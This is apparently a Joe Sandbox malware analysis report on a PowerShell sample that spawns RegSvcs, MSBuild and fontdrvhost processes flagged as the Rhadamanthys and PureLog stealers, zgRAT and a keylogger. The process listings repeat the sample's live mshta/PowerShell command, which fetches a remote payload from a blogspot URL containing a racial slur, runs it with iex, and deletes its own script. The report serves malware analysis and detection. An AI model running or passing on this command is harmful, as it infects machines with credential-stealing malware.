2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 31 30 30 30 37 32 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 31 30 30 30 34 32 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 31 30 30 30 31 32 30 30 30 30 30 30 37 37 31 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 Data Ascii: 000100000000000000000000000000000000000000000000002000100072000000000100000100000000000000000000000000000000000000000000002000100042000000000100000100000000000000000000000000000000000000000000002000100012000000771000000100000000000000000000000000000000000
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 30 30 30 30 30 30 30 30 31 30 30 37 37 33 37 37 33 37 37 33 37 37 33 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 33 30 31 33 31 30 30 30 30 30 30 30 30 30 30 31 30 30 30 31 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 35 35 30 37 31 30 30 30 30 30 30 30 30 30 30 36 34 30 31 31 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 34 35 30 31 32 30 34 36 31 34 36 31 30 34 30 35 35 31 35 35 31 32 37 30 30 35 31 37 30 30 30 30 30 30 30 30 30 30 30 35 32 31 36 30 30 35 35 31 35 35 31 32 37 30 30 31 31 34 30 30 30 30 30 30 30 30 30 30 30 34 32 31 36 30 30 34 36 31 34 36 31 30 34 30 35 35 31 35 35 31 32 37 30 30 35 31 30 35 31 30 31 30 30 30 30 30 30 30 30 30 30 33 32 31 36 30 30 30 30 30 30 30 30 30 30 30 37 34 30 31 31 30 30 Data Ascii: 000000001007737737737730000000001000003013100000000001000100000000001000000000005507100000000006401100000000001000000000004501204614610405515512700517000000000005216005515512700114000000000004216004614610405515512700510510100000000003216000000000007401100
2025-01-08 12:55:34 UTC	16384	IN	Data Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Target ID:	0
Start time:	07:54:00
Start date:	08/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2633686873.0000026C39780000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:54:00
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xff0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x7a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2380719391.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Imagebase:	0x750000
File size:	32'768 bytes
MD5 hash:	3A77A4F220612FA55118FB8D7DDAE83C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Imagebase:	0xa00000
File size:	32'768 bytes
MD5 hash:	3A77A4F220612FA55118FB8D7DDAE83C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Imagebase:	0xf70000
File size:	91'216 bytes
MD5 hash:	84C42D0F2C1AE761BEF884638BC1EACD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Imagebase:	0x20000
File size:	91'216 bytes
MD5 hash:	84C42D0F2C1AE761BEF884638BC1EACD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:55:07
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 912
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:55:08
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 784
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:55:08
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 916
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:55:08
Start date:	08/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 788
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:55:09
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\fontdrvhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\fontdrvhost.exe"
Imagebase:	0xf80000
File size:	676'584 bytes
MD5 hash:	8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000003.2375768763.0000000003450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000010.00000002.2426889440.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:55:09
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\fontdrvhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\fontdrvhost.exe"
Imagebase:	0xf80000
File size:	676'584 bytes
MD5 hash:	8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000003.2382423562.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000002.2383562069.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:55:14
Start date:	08/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);"
Imagebase:	0x7ff6a07a0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:55:15
Start date:	08/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:55:15
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	07:55:20
Start date:	08/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Imagebase:	0x7ff6a07a0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:55:28
Start date:	08/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);"
Imagebase:	0x7ff6a07a0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	07:55:29
Start date:	08/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6956, Parent PID: 6888

General

Target ID:	27
Start time:	07:55:29
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	07:55:36
Start date:	08/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Imagebase:	0x7ff6a07a0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	47.1%
Total number of Nodes:	17
Total number of Limit Nodes:	0

Executed Functions

Function 05C76DEA Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 05C76EAC
OpenMutexW.KERNEL32(00100000,00000000,?), ref: 05C76ECA
_snwprintf.NTDLL ref: 05C76F29
OpenMutexW.KERNEL32(00100000,00000000,?), ref: 05C76F41
GetCurrentProcessId.KERNEL32(!RHY), ref: 05C76F54
ProcessIdToSessionId.KERNEL32(00000000), ref: 05C76F5B
_snwprintf.NTDLL ref: 05C76FC5
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 05C76FD5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 05C76FE1
CloseHandle.KERNEL32(00000000), ref: 05C770BB

Strings

NJI@, xrefs: 05C76E07
!RHY, xrefs: 05C76F50, 05C76F53

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: _snwprintf$DescriptorMutexOpenProcessSecurity$CloseCurrentDaclHandleInitializeSession
String ID: !RHY$NJI@
API String ID: 839317306-1560612820
Opcode ID: 17d9669fb0c17c7faec31d54e65d68d0b8a868486b1d426bd20b79e4eb1bcf6b
Instruction ID: cd1846e69a858aa13ede95d03f1a22fde2d1faa32a19b18bd562f2878fd37696
Opcode Fuzzy Hash: 17d9669fb0c17c7faec31d54e65d68d0b8a868486b1d426bd20b79e4eb1bcf6b
Instruction Fuzzy Hash: 859117B690416DBECB219BE68C45FFEBFBDAB0D201F040896F695E5480D6789A40DB70

Function 05C754E0 Relevance: 19.7, APIs: 13, Instructions: 161
nativestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,?,?,?,?,00000000,00000000,05C7D278), ref: 05C7552F
malloc.MSVCRT ref: 05C75534
NtQuerySystemInformation.NTDLL(00000005,00000000,?,?,?,?,00000000,00000000,05C7D278), ref: 05C75550
GetCurrentProcess.KERNEL32(?,?,00000000,00000000,05C7D278), ref: 05C75560

Part of subcall function 05C751A4: NtQueryInformationProcess.NTDLL(05C744CC,00000018,00000000,00000004,05C744CC), ref: 05C751EF

memset.NTDLL ref: 05C755A0
RtlGetVersion.NTDLL(?), ref: 05C755B5
GetCurrentProcess.KERNEL32(?,?,00000000,00000000,05C7D278), ref: 05C755C8
OpenProcess.KERNEL32(00000400,00000000,?,?,?,00000000,00000000,05C7D278), ref: 05C755E7
CloseHandle.KERNELBASE(00000000,?,?,00000000,00000000,05C7D278), ref: 05C7561D
lstrcmpiW.KERNEL32(?,05C746B3,?,?,00000000,00000000,05C7D278), ref: 05C7564E
OpenProcess.KERNEL32(00000400,00000000,?,?,?,00000000,00000000,05C7D278), ref: 05C75661
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,05C7D278), ref: 05C75680
free.MSVCRT ref: 05C75698

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Process$InformationQuery$CloseCurrentHandleOpenSystem$Versionfreelstrcmpimallocmemset
String ID:
API String ID: 3485019467-0
Opcode ID: eae771c5c71e2c9a974c9e72b11c32ab05958aa3fefe2ba6f484da1c1681ecd8
Instruction ID: ee9cef9467f47e55c19c233c7022faa1c7f598ab90fff9e877ea646343a7a1e7
Opcode Fuzzy Hash: eae771c5c71e2c9a974c9e72b11c32ab05958aa3fefe2ba6f484da1c1681ecd8
Instruction Fuzzy Hash: 95513072D0020DABDF20AFE49D859AE7BB9FF04345F140C6EF505A6A40EB319E40DA55

Function 05C77754 Relevance: 12.1, APIs: 8, Instructions: 89
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,?,74DEF550,00000000,?,05C76011,?,00000104,00000001,?), ref: 05C7778A
malloc.MSVCRT ref: 05C7778F
NtQuerySystemInformation.NTDLL(00000005,00000000,?,?), ref: 05C777AD
GetCurrentProcess.KERNEL32 ref: 05C777B3

Part of subcall function 05C751A4: NtQueryInformationProcess.NTDLL(05C744CC,00000018,00000000,00000004,05C744CC), ref: 05C751EF

OpenProcess.KERNEL32(00000400,00000000,?), ref: 05C777CC
GetProcessImageFileNameW.PSAPI(00000000,?,?), ref: 05C777EB
CloseHandle.KERNEL32(00000000), ref: 05C77815
free.MSVCRT ref: 05C7782D

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Process$InformationQuery$System$CloseCurrentFileHandleImageNameOpenfreemalloc
String ID:
API String ID: 1043364869-0
Opcode ID: 2ea3277ea9e737d3860be9c57cb37c19fe59c1199ffe44f540b56fa95e050692
Instruction ID: 0b6ddefb81d93bfc9b8a48f0fc0abaea75f5ee2d9d19701a3988db77b5465648
Opcode Fuzzy Hash: 2ea3277ea9e737d3860be9c57cb37c19fe59c1199ffe44f540b56fa95e050692
Instruction Fuzzy Hash: 4B21487290010DBFDB11AFE4DC849AE7FA9FF04251F144869FA05A6941EB319E40DAE1

Function 05C7783C Relevance: 9.1, APIs: 6, Instructions: 79
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDriveStringsW.KERNELBASE(00000104,?,00000000,00000000,00000000), ref: 05C77874
QueryDosDeviceW.KERNELBASE(?,?,00000104), ref: 05C77895
lstrlenW.KERNEL32(?), ref: 05C778A6
_wcsnicmp.NTDLL ref: 05C778BD
_snwprintf.NTDLL ref: 05C778F4
lstrcpyW.KERNEL32(00000000,?), ref: 05C77907

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: DeviceDriveLogicalQueryStrings_snwprintf_wcsnicmplstrcpylstrlen
String ID:
API String ID: 1587640850-0
Opcode ID: e9acc7445149e2d2e2d2ba2f86a366d9da12b0d7e168e0efb6a976bc94292c94
Instruction ID: 45bf7327b3d7758a890732e2fdbeebeb466e4c9257d81256d7dcfdd431bbaeac
Opcode Fuzzy Hash: e9acc7445149e2d2e2d2ba2f86a366d9da12b0d7e168e0efb6a976bc94292c94
Instruction Fuzzy Hash: 64212B7590110DABDB20EB91D888FEA7BFDFB04755F0084A5E946A3800EB709B85CBE1

Function 05C7B701 Relevance: 7.6, APIs: 5, Instructions: 126
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,05C78A40,?,?,?,00000000,?), ref: 05C7B706
IsBadReadPtr.KERNEL32(?,?), ref: 05C7B75B
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05C7B76E
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,05C78A40,?,?,?,00000000,?), ref: 05C7B79D
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 05C7B7B8

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Heap$Allocate$FreeProcessReadVirtual
String ID:
API String ID: 3040741447-0
Opcode ID: 42941a9b24871da152f3e77b5857707e202be89f85c1c1d3bc2a063bf42e661e
Instruction ID: 68e1f829ff37df432b0b5481e3087e2f3f443aa5c44617b2642d49fe47bd15a5
Opcode Fuzzy Hash: 42941a9b24871da152f3e77b5857707e202be89f85c1c1d3bc2a063bf42e661e
Instruction Fuzzy Hash: BC41AF72600709AFDB20DF69DC45B2ABBF8FF44254F044819F459CBA40EB31E951CBA5

Function 05CA3134 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 198
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAcceptConnectPort.NTDLL ref: 05CA32BD
NtAcceptConnectPort.NTDLL ref: 05CA3318
NtAcceptConnectPort.NTDLL ref: 05CA333C

Strings

0, xrefs: 05CA3258

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005CA3000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CA3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5ca3000_RegSvcs.jbxd

Similarity

API ID: AcceptConnectPort
String ID: 0
API String ID: 1658770261-4108050209
Opcode ID: 859e6b64096550002ce24a42b28ea1e02e0324f49bc22806128dfe1776fe2b89
Instruction ID: 9ba0745780b2cba5225f0786639aa185cc8fcb9f1cd32d8cfdb09e3e41ac1638
Opcode Fuzzy Hash: 859e6b64096550002ce24a42b28ea1e02e0324f49bc22806128dfe1776fe2b89
Instruction Fuzzy Hash: 2E51C33260CB8A4BEB64EF18C894B767BD1FB94719F108E2ED44AC3151EF34D5468752

Function 05C7B28B Relevance: 3.0, APIs: 2, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,05C78A28,?), ref: 05C7B2BB
NtQueryInformationProcess.NTDLL(00000000), ref: 05C7B2C2

Memory Dump Source

Source File: 00000005.00000002.2405092435.0000000005C73000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5c73000_RegSvcs.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 20e08021ffda97d1f9fee7590cbbfbb7f4e9ef2bf12bd9bcd95a66ef50ef16ce
Instruction ID: fbe5f51aeca2e3fc22c5aa9786cd812dfc3cf0a507f150354cd07dae0b2744a8
Opcode Fuzzy Hash: 20e08021ffda97d1f9fee7590cbbfbb7f4e9ef2bf12bd9bcd95a66ef50ef16ce
Instruction Fuzzy Hash: D5F0F673A5120CBFE720D6D18D0BFDE7BACEB00754F000811F901E5980E6B49B40D6E4

Function 0652A070 Relevance: 1.6, APIs: 1, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0652A438

Memory Dump Source

Source File: 00000005.00000002.2410577664.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_64e0000_RegSvcs.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9477fea066c4830dec599c81fb2f45aece9305fbca2ae5a4cedad43ecfe5d5d7
Instruction ID: 436b213b473b47fc1c615d1bb8417d7e3bd03c3f62625bf25325d1450557d244
Opcode Fuzzy Hash: 9477fea066c4830dec599c81fb2f45aece9305fbca2ae5a4cedad43ecfe5d5d7
Instruction Fuzzy Hash: 98B1C271F102268FDB54CA69DC907AEB6A7BFD9320F188529E916DB3C1DA30DC418B91

Function 05C751A4 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

